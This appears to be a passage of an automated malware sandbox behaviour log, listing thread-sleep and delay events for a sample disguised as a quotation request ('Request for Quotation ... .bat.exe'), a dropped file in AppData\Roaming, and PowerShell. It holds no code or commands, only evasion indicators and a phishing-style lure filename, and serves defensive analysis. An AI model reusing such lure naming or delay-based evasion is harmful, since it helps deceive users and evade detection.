Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599558
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598451
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598316
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596030
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595774
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595504
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594936
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594281

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5592	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7075	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1061	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Window / User API: threadDelayed 2508	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Window / User API: threadDelayed 7333	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Window / User API: threadDelayed 2530
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Window / User API: threadDelayed 7328

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 4836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4148	Thread sleep count: 5592 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep count: 800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060	Thread sleep count: 2508 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 7060	Thread sleep count: 7333 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe TID: 5800	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 6696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088	Thread sleep count: 2530 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1088	Thread sleep count: 7328 > 30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599558s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598905s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598796s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598575s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598451s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598316s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -598077s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -597093s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -596030s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595774s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595504s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -595046s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594936s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594390s >= -30000s
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe TID: 1864	Thread sleep time: -594281s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599763	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 922337203685477
